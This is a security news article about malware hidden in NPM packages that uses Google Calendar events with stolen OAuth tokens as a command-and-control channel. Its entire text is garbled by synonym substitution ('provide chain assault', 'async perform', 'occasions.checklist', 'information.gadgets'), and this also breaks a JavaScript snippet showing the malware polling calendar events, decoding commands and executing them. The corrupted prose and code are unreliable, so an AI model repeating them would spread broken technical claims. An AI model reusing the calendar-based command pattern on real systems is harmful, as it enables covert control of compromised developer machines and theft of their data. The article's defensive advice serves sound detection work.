A brand new superior provide chain assault focusing on the Node Bundle Supervisor (NPM) ecosystem has emerged, leveraging Google Calendar as a covert command and management (C2) channel.
Cybersecurity specialists found the malware embedded in seemingly reputable JavaScript libraries that, as soon as put in, set up a stealthy communication pathway with attackers via widespread Google providers.
The malware has doubtlessly compromised hundreds of growth environments since its first look roughly two weeks in the past, with contaminated packages having been downloaded over 35,000 occasions earlier than discovery.
The assault begins when builders unknowingly set up compromised NPM packages that comprise obfuscated payloads designed to evade customary safety scans.
Upon set up, the malicious code executes with the identical privileges because the consumer, establishing persistence and initiating its communication protocol.
In contrast to standard C2 infrastructures that depend on suspicious domains, this assault technique abuses trusted Google providers, making detection notably difficult for safety instruments configured to flag uncommon community locations.
Veracode researchers recognized the risk after observing anomalous API calls to Google Calendar throughout routine safety monitoring of growth environments.
“What makes this assault notably regarding is its abuse of reputable cloud providers,” stated Dr. Alex Chen, Principal Safety Researcher at Veracode.
“By hiding in plain sight inside Google Calendar occasions, the malware’s communications mix completely with regular enterprise visitors.”
The malware exploits OAuth tokens to authenticate with Google’s API providers, creating or modifying calendar occasions that comprise encoded instructions.
These seemingly harmless calendar entries function each the management mechanism and exfiltration channel, with attackers embedding instructions in occasion descriptions, areas, and attendee fields.
The method successfully bypasses many information loss prevention techniques that sometimes whitelist Google providers.
Additional evaluation reveals subtle anti-analysis methods integrated into the malware, together with atmosphere consciousness checks that forestall execution in virtualized environments and debugging instruments.
The malware additionally implements a delayed execution sample to evade sandbox detection, solely activating its payload after figuring out it resides in a reputable growth atmosphere relatively than an evaluation system.
Calendar-Primarily based Command & Management
The malware’s Google Calendar C2 mechanism represents an revolutionary method to sustaining persistent management.
After establishing preliminary entry, the malware creates a hidden background course of that periodically queries the consumer’s Google Calendar utilizing stolen OAuth credentials.
The next code snippet illustrates how the malware accesses the Calendar API:-
const {google} = require(‘googleapis’);
const calendar = google.calendar({model: ‘v3’, auth: stolenOAuth});
async perform checkForCommands() {
const res = await calendar.occasions.checklist({
calendarId: ‘major’,
timeMin: new Date().toISOString(),
maxResults: 10,
singleEvents: true,
orderBy: ‘startTime’,
q: ‘sync_status’ // Particular marker utilized by attackers
});
const occasions = res.information.gadgets;
if (occasions. Size) {
const instructions = decodeCommands(occasions[0].description);
executeCommands(instructions);
// Delete or modify occasion to acknowledge receipt
await calendar.occasions.delete({calendarId: ‘major’, eventId: occasions[0].id});
}
}
The malware parses occasion descriptions for base64-encoded instructions hidden inside seemingly reputable textual content.
These instructions allow attackers to execute arbitrary code, exfiltrate delicate information, or obtain further payloads.
For information exfiltration, the malware cleverly encodes stolen data as calendar occasion attachments or inside assembly notes.
Organizations are suggested to implement strict OAuth software monitoring, carry out complete dependency scanning of Node.js initiatives, and deploy superior behavioral monitoring to detect anomalous calendar API utilization.
Safety groups ought to particularly search for calendar modifications occurring exterior regular consumer exercise patterns, notably these with embedded encoded content material.
How SOC Groups Save Time and Effort with ANY.RUN – Stay webinar for SOC groups and managers
